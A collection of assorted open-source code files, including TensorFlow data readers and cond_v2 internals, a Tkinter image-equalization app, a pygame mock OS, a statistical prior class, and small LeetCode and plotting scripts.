return context\n\n\n def convert2TFRecords(self,filenames,mode):\n filename_queue = tf.train.string_input_producer(filenames)\n reader = tf.WholeFileReader()\n key, example = reader.read(filename_queue)\n parsed_example = tf.string_split([example], '\\n')\n filename = os.path.join(\"../data\", \"cnn_\" + mode + \"_0\" + '.tfrecords')\n writer = tf.python_io.TFRecordWriter(filename)\n\n with tf.Session() as sess:\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for i in range(len(filenames)):\n # Retrieve a single instance:\n if i > 0 and (i % 1000 == 0):\n writer.close()\n filename = os.path.join(\"../data\", \"ptb_train_\" + \"_\" + str(i) + '.tfrecords')\n writer = tf.python_io.TFRecordWriter(filename)\n\n (_, data, _) = sess.run(parsed_example)\n print(data[0])\n sentences = [list(map(int, d.decode().split(\" \"))) + [self.EOS_ID] for d in data]\n\n\n print(sentences[0])\n\n for sent in sentences:\n feature_list = {\n 'input_seq': PTBReader._int64_feature(sent[0:len(sent) - 1 ]),\n 'output_seq': PTBReader._int64_feature(sent[1:])\n }\n\n feature = tf.train.Features(feature=feature_list)\n example = tf.train.Example(features=feature)\n\n writer.write(example.SerializeToString())\n\n writer.close()\n coord.request_stop()\n coord.join(threads)\n\n def read_tf_record_file(self,filename_queue):\n reader = tf.TFRecordReader()\n key, serialized_example = reader.read(filename_queue)\n\n features = {\n 'input_seq': tf.VarLenFeature(tf.int64),\n 'output_seq': tf.VarLenFeature(tf.int64),\n }\n\n parsed_example = tf.parse_single_example(serialized_example, features=features)\n\n return parsed_example['input_seq'], parsed_example['output_seq'], \\\n parsed_example['input_seq'].dense_shape, parsed_example['output_seq'].dense_shape\n\n def reader(self):\n filenames = [\"../data/ptb_train_0.tfrecords\"]\n batch_size = 10\n min_after_dequeue = 1000\n\n filename_queue = tf.train.string_input_producer(\n filenames)\n input_sequence, output_sequence, input_shape, output_shape = self.read_tf_record_file(filename_queue)\n\n input_seq_batch, output_seq_batch, input_shape_batch, output_shape_batch = tf.train.shuffle_batch(\n [input_sequence, output_sequence, input_shape, output_shape], batch_size=batch_size,\n capacity=min_after_dequeue * 3 + 1, min_after_dequeue=min_after_dequeue)\n\n\n\n dense_input_seq_batch = tf.sparse_to_dense(sparse_indices=input_seq_batch.indices,\n output_shape=input_seq_batch.dense_shape,\n sparse_values=input_seq_batch.values,\n default_value=0,\n validate_indices=True,\n name=None)\n dens_output_seq_batch = tf.sparse_to_dense(sparse_indices=output_seq_batch.indices,\n output_shape=output_seq_batch.dense_shape,\n sparse_values=output_seq_batch.values,\n default_value=0,\n validate_indices=True,\n name=None)\n\n input_seq_lengths = tf.reshape(input_shape_batch, [batch_size])\n output_seq_lengths = tf.reshape(output_shape_batch, [batch_size])\n\n with tf.Session() as sess:\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for i in range(100):\n print(i)\n [input, output, input_lengths,output_length] = sess.run([dense_input_seq_batch,dens_output_seq_batch,input_seq_lengths,output_seq_lengths])\n\n #print(input[0])\n print(input_lengths[0],\" \",output_length[0])\n print(input[0])\n print(output[0])\n\n coord.request_stop()\n coord.join(threads)\n\n\n\n\nif __name__ == '__main__':\n ptb_reader = PTBReader(data_dir=\"../data\",dataset_name=\"ptb\", vocab_size=10000)\n #ptb_reader.build_vocab_file() #read_words()\n\n mode = \"train\"\n train_files = glob(os.path.join(\"../data\", \"ptb\",\n mode, \"*.txt.ids%s_*\" % (10000)))\n #ptb_reader.convert2TFRecords(filenames=train_files,mode=mode)\n\n ptb_reader.reader()","repo_name":"samiraabnar/ContextualWordEmbeddings","sub_path":"src/PTBReader.py","file_name":"PTBReader.py","file_ext":"py","file_size_in_byte":12574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"4007025675","text":"import cv2\nimport numpy as np\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\ndef open_file_img():\n file_path = filedialog.askopenfilename(filetypes=[(\"JPEG\", \"*.jpeg\"), (\"PNG\", \"*.png\"), (\"All file\", \"*.*\")])\n if file_path:\n label_text_re.config(text=\"Ảnh kết quả\")\n try:\n global img\n img = cv2.imread(file_path)\n img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img_pil = Image.fromarray(img_rgb)\n img_tk = ImageTk.PhotoImage(img_pil)\n\n label_img_or.config(image=img_tk)\n label_img_or.image = img_tk\n except:\n label_text_re.config(text=\"Hãy chọn ảnh\")\n\ndef improve_img():\n if img is not None:\n img_yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)\n # equalize the histogram of the Y channel\n img_yuv[:,:,0] = cv2.equalizeHist(img_yuv[:,:,0])\n # convert the YUV image back to RGB format\n global img_output\n img_output = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)\n img_rgb = cv2.cvtColor(img_output, cv2.COLOR_BGR2RGB)\n img_pil = Image.fromarray(img_rgb)\n img_tk = ImageTk.PhotoImage(img_pil)\n\n label_img_re.config(image=img_tk)\n label_img_re.image = img_tk\n else:\n label_text_re.config(text=\"Hãy chọn ảnh\")\n\ndef save_img():\n if img is not None:\n file_path = filedialog.asksaveasfilename(defaultextension=[\".jpeg\", \".png\"],filetypes=[(\"JPEG\", \"*.jpeg\"), (\"PNG\", \"*.png\")])\n if file_path:\n cv2.imwrite(file_path, img_output)\n print(\"Lưu ảnh thành công\")\n else:\n label_text_re.config(text=\"Không có ảnh để lưu\")\n\n\nw = Tk()\nw.title(\"Tăng chất lượng hình ảnh thiếu sáng\")\n\nframe_input = Frame(w)\nframe_input.pack()\n\nbutton_file = Button(frame_input, text=\"Chọn ảnh\", command=open_file_img)\nbutton_file.pack(side=LEFT)\n\nbutton_cre = Button(frame_input, text=\"Cải thiện ảnh\", command=improve_img)\nbutton_cre.pack(side=LEFT)\n\nbutton_save = Button(frame_input, text=\"Lưu ảnh\", command=save_img)\nbutton_save.pack(side=LEFT)\n\nframe_output = Frame(w)\nframe_output.pack()\n\nframe_origin = Frame(frame_output)\nframe_origin.pack(side=LEFT)\n\nlabel_text_or = Label(frame_origin, text=\"Ảnh gốc\")\nlabel_text_or.pack()\n\nlabel_img_or = Label(frame_origin)\nlabel_img_or.pack()\n\nframe_resutl = Frame(frame_output)\nframe_resutl.pack(side=LEFT)\n\nlabel_text_re = Label(frame_resutl, text=\"Ảnh kết quả\")\nlabel_text_re.pack()\n\nlabel_img_re = Label(frame_resutl)\nlabel_img_re.pack()\n\nw.mainloop()","repo_name":"nguyenduyquang6122/TH_ma_nguon_mo","sub_path":"BaiTH_09.py","file_name":"BaiTH_09.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72523828366","text":"import numpy as np\nfrom .pdistributions import Prior_distribution\n\nclass Gen_normal_prior(Prior_distribution):\n def __init__(self,mu=0.0,s=10.0,v=2,**kwargs):\n \"\"\" \n Independent Generalized Normal prior distribution used for each type of hyperparameters in log-space. \n If the type of the hyperparameter is multi dimensional (H) it is given in the axis=-1. \n If multiple values (M) of the hyperparameter(/s) are calculated simultaneously it has to be in a (M,H) array. \n Parameters:\n mu: float or (H) array\n The mean of the generalized normal distribution. \n std: float or (H) array\n The scale of the generalized normal distribution.\n v: float or (H) array\n The shape or magnitude of the generalized normal distribution.\n \"\"\"\n self.update_arguments(mu=mu,\n s=s,\n v=v,\n **kwargs)\n \n def ln_pdf(self,x):\n if self.nosum:\n return -((x-self.mu)/self.s)**(2*self.v)-np.log(self.s)+np.log(0.52)\n return np.sum(-((x-self.mu)/self.s)**(2*self.v)-np.log(self.s)+np.log(0.52),axis=-1)\n \n def ln_deriv(self,x):\n return (-(2.0*self.v)*((x-self.mu)**(2*self.v-1)))/(self.s**(2*self.v))\n \n def update_arguments(self,mu=None,s=None,v=None,**kwargs):\n \"\"\"\n Update the object with its arguments. The existing arguments are used if they are not given.\n Parameters:\n mu: float or (H) array\n The mean of the generalized normal distribution. \n std: float or (H) array\n The scale of the generalized normal distribution.\n v: float or (H) array\n The shape or magnitude of the generalized normal distribution.\n Returns:\n self: The updated object itself.\n \"\"\"\n if mu is not None:\n if isinstance(mu,(float,int)):\n self.mu=mu\n else:\n self.mu=np.array(mu).reshape(-1)\n if s is not None:\n if isinstance(s,(float,int)):\n self.s=s\n else:\n self.s=np.array(s).reshape(-1)\n if v is not None:\n if isinstance(v,(float,int)):\n self.v=v\n else:\n self.v=np.array(v).reshape(-1)\n if isinstance(self.mu,(float,int)) and isinstance(self.s,(float,int)) and isinstance(self.v,(float,int)):\n self.nosum=True\n else:\n self.nosum=False\n return self\n \n def mean_var(self,mean,var):\n return self.update_arguments(mu=mean,s=np.sqrt(var/0.32))\n \n def min_max(self,min_v,max_v):\n mu=(max_v+min_v)/2.0\n return self.update_arguments(mu=mu,s=np.sqrt(2.0/0.32)*(max_v-mu))\n \n def get_arguments(self):\n \" Get the arguments of the class itself. \"\n # Get the arguments given to the class in the initialization\n arg_kwargs=dict(mu=self.mu,s=self.s,v=self.v)\n # Get the constants made within the class\n constant_kwargs=dict()\n # Get the objects made within the class\n object_kwargs=dict()\n return arg_kwargs,constant_kwargs,object_kwargs\n","repo_name":"avishart/hpfitter","sub_path":"hpfitter/pdistributions/gen_normal.py","file_name":"gen_normal.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"27287356223","text":"import random\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.runningSum = 0\n self.sumList = []\n for num in w:\n self.runningSum += num\n self.sumList.append(self.runningSum)\n\n def pickIndex(self) -> int:\n num = random.choice(range(self.runningSum))\n return bisect.bisect(self.sumList, num)\n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(w)\n# param_1 = obj.pickIndex()\n","repo_name":"Xynoclafe/leetcode","sub_path":"medium/randomPickWeight_withBisect.py","file_name":"randomPickWeight_withBisect.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"8065103253","text":"#script para realizar grafica de coseno y su derivada\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndatos = np.genfromtxt(\"datos.dat\")\n\nx = datos[:,0]\ncos = datos[:,1]\nsen = datos[:,2]\n\nplt.figure()\nplt.plot(x, cos, label=\"coseno\")\nplt.plot(x, sen, label=\"derivada numerica de coseno\")\nplt.xlabel(\"x (radianes)\")\nplt.ylabel(\"f (x)\")\nplt.legend()\nplt.title(\"Coseno con su derivada numerica\")\nplt.grid()\nplt.savefig(\"S5C1PLOT.pdf\")\n","repo_name":"aherrera3/MetodosComputacionales","sub_path":"HerreraAngelicaS5C1/plotsS5C1.py","file_name":"plotsS5C1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"18607804985","text":"'''\nWE KAN DOers: Nicholas Tarsis, Kosta Dubovskiy\nSoft Dev\n#5\n22-09-28\n'''\n\n'''\nDISCO:\nNicholas learned about randchoice\nKonstantin learned about randrange\nWe reviewed file io with sys.stdin\nWe implemented f strings in our output\n* \nQCC:\nOPS SUMMARY:\n'''\nimport random\nimport sys\nsys.stdin = open(\"krewes.txt\",\"r\")\n\ndef read():\n s = input().split(\"@@@\")[:-1]\n people_list = {}\n for i in s:\n stuff = i.split(\"$$$\")\n if stuff[0] not in people_list:\n people_list[stuff[0]]=[]\n people_list[stuff[0]].append((stuff[1],stuff[2]))\n return people_list\n \n \n \n\ndef get_devo(krewes):\n rand_key = random.choice(list(krewes.keys()))\n rand_devo = krewes[rand_key][random.randrange(len(krewes[rand_key]))]\n return f'{rand_key}: ({rand_devo[0]}, {rand_devo[1]})'\n\nkrewes = {\n 2:[\"NICHOLAS\", \"ANTHONY\", \"BRIAN\", \"SAMUEL\", \"JULIA\", \"YUSHA\", \"CORINA\", \"CRAIG\", \"FANG MIN\", \"JEFF\", \"KONSTANTIN\", \"AARON\", \"VIVIAN\", \"AYMAN\", \"TALIA\", \"FAIZA\", \"ZIYING\", \"YUK KWAN\", \"DANIEL\", \"WEICHEN\", \"MAYA\", \"ELIZABETH\", \"ANDREW\", \"VANSH\", \"JONATHAN\", \"ABID\", \"WILLIAM\", \"HUI\", \"ANSON\", \"KEVIN\", \"DANIEL\", \"IVAN\", \"JASMINE\", \"JEFFREY\"], \n 7:[\"DIANA\", \"DAVID\", \"SAM\", \"PRATTAY\", \"ANNA\", \"JING YI\", \"ADEN\", \"EMERSON\", \"RUSSELL\", \"JACOB\", \"WILLIAM\", \"NADA\", \"SAMANTHA\", \"IAN\", \"MARC\", \"ANJINI\", \"JEREMY\", \"LAUREN\", \"KEVIN\", \"RAVINDRA\", \"SADI\", \"EMILY\", \"GITAE\", \"MAY\", \"MAHIR\", \"VIVIAN\", \"GABRIEL\", \"BRIANNA\", \"JUN HONG\", \"JOSEPH\", \"MATTHEW\", \"JAMES\", \"THOMAS\", \"NICOLE\", \"Karen\"],\n 8:[\"ALEKSANDRA\", \"NAKIB\", \"AMEER\", \"HENRY\", \"DONALD\", \"YAT LONG\", \"SEBASTIAN\", \"DAVID\", \"YUKI\", \"SHAFIUL\", \"DANIEL\", \"SELENA\", \"JOSEPH\", \"SHINJI\", \"RYAN\", \"APRIL\", \"ERICA\", \"JIAN HONG\", \"VERIT\", \"JOSHUA\", \"WILSON\", \"AAHAN\", \"GORDON\", \"JUSTIN\", \"MAYA\", \"FAIYAZ\", \"SHREYA\", \"ERIC\", \"JEFFERY\", \"BRIAN\", \"KEVIN\", \"SAMSON\", \"BRIAN\", \"HARRY\", \"wanying\"]\n }\n\nprint(get_devo(read()))\n","repo_name":"kostadubovskiy/softdev","sub_path":"05_bitstream/krewes.py","file_name":"krewes.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43792120288","text":"# DhilltOS, Graphical edition\n# 2023, Mizu, kevadesu and contributors\nimport pygame, json, sys, os, datetime, time\n\ndef writeText(window, font_name, string, x, y, colour, fs, bg = None):\n\tfont = pygame.font.Font(f'storage/fonts/{font_name}.ttf', fs)\n\ttext = font.render(string, True, colour)\n\tif not bg is None:\n\t\trect = text.get_rect()\n\t\trect.x += x\n\t\trect.y += y\n\t\tpygame.draw.rect(screen, bg, rect)\n\twindow.blit(text, (x,y))\n\ndef putImage(window, image, x, y, mode=\"center\"):\n\trect = image.get_rect()\n\tscreenRect = screen.get_rect()\n\tif mode == \"center\":\n\t\trect.center = (screenRect.centerx + x, screenRect.centery + y)\n\twindow.blit(image, (x,y), rect)\n\nwith open('machine.json', 'r') as f:\n\tMACHINE_SETTINGS = json.loads(f.read())\nVERSION = [1, 0, 0, 'dev']\n\n# initialize it\npygame.init()\n\n# configurations\nframes_per_second = MACHINE_SETTINGS['capped_fps']\nwindow_width = MACHINE_SETTINGS['default_resolution'][0]\nwindow_height = MACHINE_SETTINGS['default_resolution'][1]\n\n# creating window\nscreen = pygame.display.set_mode((window_width, window_height), pygame.RESIZABLE)\nvstring = '.'.join([str(e) for e in VERSION])\npygame.display.set_caption(f'DhilltOS v{vstring} (starting up) @ expects {frames_per_second}FPS')\n\nSYS_IMAGES = {}\nfor img in os.listdir('storage/sys/img'):\n\tif os.path.isfile('storage/sys/img/' + img) and not img.startswith('_'):\n\t\tSYS_IMAGES['.'.join(img.split('.')[:-1])] = pygame.image.load('storage/sys/img/' + img)\nSYS_IMAGES['lock'] = pygame.transform.scale(SYS_IMAGES['lock'], (window_width, window_height))\nscreen.blit(SYS_IMAGES['bootlogo'], (0,0), screen.get_rect()); pygame.display.flip()\nwriteText(screen, 'VictorMono/VictorMono-Bold', 'Resources imported', 0, 0, (255, 255, 255), 12, (0, 64, 0)); pygame.display.flip()\nwriteText(screen, 'VictorMono/VictorMono-Bold', 'Drivers ready', 0, 12, (255, 255, 255), 12, (0, 64, 0)); pygame.display.flip()\n\n# creating our frame regulator\nclock = pygame.time.Clock()\n\ndt = 0\n# forever loop\npygame.display.set_caption(f'DhilltOS v{vstring} (login) @ {frames_per_second}FPS')\nwhile True:\n\t# fill the screen with a color to wipe away anything from last frame\n\tscreen.fill(\"black\")\n\n \t# event loop\n\tscreen.blit(SYS_IMAGES['lock'], (0,0), screen.get_rect())\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\t\telif event.type == pygame.VIDEORESIZE:\n\t\t\tscreen = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\n\t\t\tSYS_IMAGES['lock'] = pygame.transform.scale(SYS_IMAGES['lock'], (event.w, event.h))\n\n\tif dt > 0 and MACHINE_SETTINGS['display_fps']:\n\t\twriteText(screen, 'VictorMono/VictorMono-Regular', f'{round(1/dt)} FPS', 0, 0, (255, 255, 255), 12, (64, 64, 64))\n\n\tpygame.display.flip()\n\n\t# frame clock ticking\n\tdt = clock.tick(frames_per_second) / 1000","repo_name":"Rexxt/DhilltOS-pygame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"33402242843","text":"\"\"\"11. Container With Most Water\nhttps://leetcode.com/problems/container-with-most-water/\nYou are given an integer array height of length n. \nThere are n vertical lines drawn such that the two endpoints of the ith line are (i, 0) and (i, height[i]).\n\nFind two lines that together with the x-axis form a container, such that the container contains the most water.\n\nReturn the maximum amount of water a container can store.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n l_idx = 0\n r_idx = len(height) - 1\n area = 0\n\n while l_idx < r_idx:\n new_area = (r_idx - l_idx) * min(height[l_idx], height[r_idx])\n area = max(area, new_area)\n if height[l_idx] < height[r_idx]:\n l_idx += 1\n else:\n r_idx -= 1\n return area\n\n\nif __name__ == \"__main__\":\n assert Solution().maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49\n","repo_name":"iKintosh/algorithms_in_python","sub_path":"src/leetcode/max_area.py","file_name":"max_area.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73958117967","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.core.framework import attr_value_pb2\nfrom tensorflow.python import pywrap_tensorflow as c_api\nfrom tensorflow.python.framework import c_api_util\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_util\nfrom tensorflow.python.ops import gen_functional_ops\nfrom tensorflow.python.util import compat\n\n\n# The following modules cannot be imported directly because they cause circular\n# dependencies. These are set in each corresponding module.\n_function = None\n_function_def_to_graph = None\n_gradients_impl = None\n\n# NOTE(skyewm): TensorFlow uses protected class methods and fields to signify\n# that they aren't part of the official public API. These protected members\n# often need to be used by implementation code however. Rather than litter the\n# code with pylint comments, we ignore protected access violations for\n# readability.\n# pylint: disable=protected-access\n\n\ndef cond_v2(pred, true_fn, false_fn, name=\"cond\"):\n \"\"\"Like tf.cond, except emits a single If op.\"\"\"\n if not name:\n name = \"cond\"\n\n with ops.name_scope(name) as scope:\n # Identify if there is a caller device, & get the innermost if possible.\n device_stack = ops.get_default_graph()._device_function_stack\n caller_device = device_stack[-1] if device_stack else None\n\n caller_colocation_stack = ops.get_default_graph()._colocation_stack\n caller_container = ops.get_default_graph()._container\n caller_collection_ref = ops.get_default_graph()._collections\n\n func_name_prefix = scope.replace(\"/\", \"_\")\n\n true_graph = _function.func_graph_from_py_func(\n true_fn, [], [],\n name=\"%strue\" % func_name_prefix,\n device=caller_device,\n colocation_stack=caller_colocation_stack,\n collections_ref=caller_collection_ref,\n container=caller_container)\n false_graph = _function.func_graph_from_py_func(\n false_fn, [], [],\n name=\"%sfalse\" % func_name_prefix,\n device=caller_device,\n colocation_stack=caller_colocation_stack,\n collections_ref=caller_collection_ref,\n container=caller_container)\n _check_same_outputs(true_graph, false_graph)\n\n # Add inputs to true_graph and false_graph to make them match. Note that\n # this modifies true_graph and false_graph.\n cond_inputs = _make_inputs_match(true_graph, false_graph,\n true_graph.extra_inputs,\n false_graph.extra_inputs)\n\n # Add all intermediate tensors as function outputs so they're available for\n # the gradient computation.\n\n true_intermediates = _get_intermediates(true_graph)\n false_intermediates = _get_intermediates(false_graph)\n\n # Save the original number of outputs to return to the caller.\n num_cond_outputs = len(true_graph.outputs)\n\n # Make the number/type of new intermediate outputs match.\n extra_true_outputs, extra_false_outputs = _pad_params(\n true_graph, false_graph, true_intermediates, false_intermediates)\n\n true_graph.outputs.extend(extra_true_outputs)\n false_graph.outputs.extend(extra_false_outputs)\n\n # Create the If op.\n tensors = gen_functional_ops._if(\n pred, cond_inputs, [t.dtype for t in true_graph.outputs],\n _create_new_tf_function(true_graph),\n _create_new_tf_function(false_graph),\n name=scope)\n\n # Set the flag to enable lowering on the `if` op if necessary\n # Lowering allows cond_v2 to avoid some of the limitations of Functions,\n # allowing users to specify devices & colocation inside of cond_v2 branches,\n # and enabling non-strict evaluation & partial pruning of cond_v2 branches.\n # This brings cond_v2 closer to feature parity with tf.cond.\n #\n # However, we do not lower `If` in the XLA context because it is easier for\n # XLA to apply its own optimizations when dealing with un-lowered `If`\n # operators than with lowered switch/merge control flow.\n #\n # TODO(b/110167197) this approach requires cond_v2 to have at least 1 output\n if_op = tensors[0].op\n if not control_flow_util.IsInXLAContext(if_op):\n if_op._set_attr(\"_lower_using_switch_merge\",\n attr_value_pb2.AttrValue(b=True))\n\n return tensors[:num_cond_outputs]\n\n\n@ops.RegisterGradient(\"If\")\ndef _IfGrad(op, *grads): # pylint: disable=invalid-name\n \"\"\"The gradient of an If op produced by cond_v2.\"\"\"\n true_graph, false_graph = _get_func_graphs(op)\n\n # Create grad functions that compute the gradient of the true/false forward\n # graphs. These functions will capture tensors from the forward pass\n # functions.\n true_grad_graph = _create_grad_func(\n true_graph, grads, _get_grad_fn_name(true_graph))\n false_grad_graph = _create_grad_func(\n false_graph, grads, _get_grad_fn_name(false_graph))\n\n assert ([t.dtype for t in true_grad_graph.outputs] ==\n [t.dtype for t in false_grad_graph.outputs])\n\n # Match up the captured grad function inputs with outputs of 'op' and other\n # external tensors.\n true_grad_inputs = _get_grad_inputs(op, true_graph, true_grad_graph)\n false_grad_inputs = _get_grad_inputs(op, false_graph, false_grad_graph)\n\n # Make the inputs to true_grad_graph and false_grad_graph match. Note that\n # this modifies true_grad_graph and false_grad_graph.\n grad_inputs = _make_inputs_match(true_grad_graph, false_grad_graph,\n true_grad_inputs, false_grad_inputs)\n\n # Add all intermediate tensors as function outputs so they're available for\n # higher-order gradient computations.\n\n true_grad_intermediates = _get_intermediates(true_grad_graph)\n false_grad_intermediates = _get_intermediates(false_grad_graph)\n\n # Save the original number of gradient outputs to return.\n num_grad_outputs = len(true_grad_graph.outputs)\n\n # Make the number/type of new intermediate outputs match.\n extra_true_grad_outputs, extra_false_grad_outputs = _pad_params(\n true_grad_graph, false_grad_graph,\n true_grad_intermediates, false_grad_intermediates)\n\n true_grad_graph.outputs.extend(extra_true_grad_outputs)\n false_grad_graph.outputs.extend(extra_false_grad_outputs)\n\n # Create the gradient If op.\n tensors = gen_functional_ops._if(\n op.inputs[0], grad_inputs, [t.dtype for t in true_grad_graph.outputs],\n _create_new_tf_function(true_grad_graph),\n _create_new_tf_function(false_grad_graph))\n\n # The predicate has no gradient.\n return [None] + tensors[:num_grad_outputs]\n\n\ndef _get_func_graphs(if_op):\n \"\"\"Returns `_FuncGraph`s for the input op branches.\n\n Args:\n if_op: The _If Operation.\n\n Returns:\n A 2-tuple of the `_FuncGraph`s of the then_branch and else_branch.\n \"\"\"\n def _get_func_graph_for_branch(branch_name):\n \"\"\"Generates and returns a _FuncGraph for the given branch.\"\"\"\n extra_inputs = if_op.inputs[1:] # First input is pred.\n input_shapes = [t.shape for t in extra_inputs]\n func_name = if_op.get_attr(branch_name).name\n fdef = if_op.graph._get_function(func_name).definition\n func_graph = _function_def_to_graph.function_def_to_graph(\n fdef, input_shapes)\n func_graph.extra_inputs = extra_inputs\n func_graph.extra_args = func_graph.inputs\n func_graph._captured = dict(zip(extra_inputs, func_graph.inputs))\n return func_graph\n\n return (_get_func_graph_for_branch(\"then_branch\"),\n _get_func_graph_for_branch(\"else_branch\"))\n\n\ndef _grad_fn(func_graph, grads):\n \"\"\"The gradient function for each conditional branch.\n\n This function builds the gradient graph of the corresponding forward-pass\n conditional branch in `func_graph`. This is done by differentiating\n func_graph's outputs w.r.t. its inputs.\n\n Args:\n func_graph: function._FuncGraph. The corresponding forward-pass function.\n grads: The list of input gradient Tensors.\n\n Returns:\n The output gradient Tensors.\n \"\"\"\n # Filter out untrainable function outputs.\n # NOTE(skyewm): If we don't do this, the untrainable tensors can sometimes\n # cause _GradientsHelper to raise an exception (e.g. the implementation\n # doesn't expect 'ys' to contain boolean tensors).\n assert len(func_graph.outputs) == len(grads)\n ys = []\n grad_ys = []\n for y, grad_y in zip(func_graph.outputs, grads):\n if not _gradients_impl._IsTrainable(y):\n continue\n ys.append(y)\n grad_ys.append(grad_y)\n\n # Build the gradient graph. Note that this builds the gradient computation of\n # func_graph in the current graph, which requires capturing tensors from\n # func_graph. The captured func_graph tensors are resolved to external tensors\n # in _get_grad_inputs.\n result = _gradients_impl._GradientsHelper(\n ys, func_graph.inputs, grad_ys=grad_ys,\n src_graph=func_graph)\n\n # Functions can't return None; replace Nones with zero tensors.\n # TODO(b/80444525): don't return anything here and make _IfGrad return None if\n # both branches have zero gradient.\n for i in range(len(result)):\n if result[i] is None:\n result[i] = array_ops.zeros_like(func_graph.inputs[i])\n\n return result\n\n\ndef _create_grad_func(func_graph, grads, name):\n \"\"\"Returns the _FuncGraph representation of _grad_fn.\"\"\"\n return _function.func_graph_from_py_func(lambda: _grad_fn(func_graph, grads),\n [], [], name)\n\n\ndef _get_grad_inputs(if_op, cond_graph, grad_graph):\n \"\"\"Returns the tensors we should pass to grad_graph.\n\n This method handles tensors captured from cond_graph in grad_graph. It\n converts these to suitable input tensors from the outer graph.\n\n Args:\n if_op: Operation. The forward-pass If op that uses cond_graph.\n cond_graph: function._FuncGraph. The forward-pass function.\n grad_graph: function._FuncGraph. The gradients function.\n\n Returns:\n A list of inputs tensors to be passed to grad_graph.\n \"\"\"\n inputs = []\n\n # Maps placeholders in cond_graph -> input tensor in outer graph.\n forward_input_map = {v: k for k, v in cond_graph._captured.items()}\n\n for t in grad_graph.extra_inputs:\n if t.graph == ops.get_default_graph():\n # t is in the outer graph (e.g. one of the input gradients).\n inputs.append(t)\n elif t in forward_input_map:\n # t is an input placeholder in cond_graph. Get the corresponding input\n # tensor in the outer graph.\n assert t.graph == cond_graph\n assert forward_input_map[t].graph == ops.get_default_graph()\n inputs.append(forward_input_map[t])\n else:\n # t is an intermediate value in cond_graph. Get the corresponding output\n # of 'if_op' (note that all intermediate values are outputs).\n assert t.graph == cond_graph\n output_idx = cond_graph.outputs.index(t)\n inputs.append(if_op.outputs[output_idx])\n\n return inputs\n\n\ndef _create_new_tf_function(func_graph):\n \"\"\"Converts func_graph to a TF_Function and adds it to the current graph.\n\n Args:\n func_graph: function._FuncGraph\n\n Returns:\n The name of the new TF_Function.\n \"\"\"\n c_func = c_api.TF_GraphToFunction_wrapper(\n func_graph._c_graph,\n compat.as_str(func_graph.name),\n False, # append_hash_to_fn_name\n None, # opers\n [t._as_tf_output() for t in func_graph.inputs],\n [t._as_tf_output() for t in func_graph.outputs],\n [],\n None, # opts\n None) # description\n _ = c_api_util.ScopedTFFunction(c_func)\n\n # TODO(b/109833212): this sucks, we're serializing the TF_Function*,\n # deserializing it into a Python FunctionDef, then reserializing it to create\n # a new TF_Function that we add to the graph.\n fdef = _function.function_def_from_tf_function(c_func)\n defined_func = _function._from_definition(fdef)\n defined_func.add_to_graph(ops.get_default_graph())\n\n return func_graph.name\n\n\ndef _get_intermediates(func_graph):\n \"\"\"Returns all tensors in `func_graph` that aren't inputs or outputs.\"\"\"\n intermediates = []\n for op in func_graph.get_operations():\n for t in op.outputs:\n if t in func_graph.inputs: continue\n if t in func_graph.outputs: continue\n intermediates.append(t)\n return intermediates\n\n\ndef _separate_unique_inputs(true_inputs, false_inputs):\n \"\"\"Separates tensors appearing only in true_inputs or false_inputs, or both.\n\n Args:\n true_inputs: list of Tensors\n false_inputs: list of Tensors\n\n Returns:\n Three lists of Tensors:\n 1. The tensors that appear in both true_inputs and false_inputs\n 2. The tensors that only appear in true_inputs\n 3. The tensors that only appear in false_inputs\n \"\"\"\n true_inputs = set(true_inputs)\n false_inputs = set(false_inputs)\n\n shared_inputs = true_inputs.intersection(false_inputs)\n true_only_inputs = true_inputs - false_inputs\n false_only_inputs = false_inputs - true_inputs\n\n return list(shared_inputs), list(true_only_inputs), list(false_only_inputs)\n\n\ndef _pad_params(true_graph, false_graph, true_params, false_params):\n \"\"\"Returns new param lists that have matching signatures.\n\n This is done by mirroring each param list in the other using dummy params.\n There is no merging of params.\n\n Args:\n true_graph: function._FuncGraph\n false_graph: function._FuncGraph\n true_params: a list of Tensors from true_graph\n false_params: a list of Tensors from false_graph\n\n Returns:\n A new list of Tensors in true_graph and a new list of Tensors in\n false_graph. The two lists have the same number of Tensors, with matching\n types and shapes across the lists.\n \"\"\"\n new_true_params = (true_params +\n _create_dummy_params(true_graph, false_params))\n 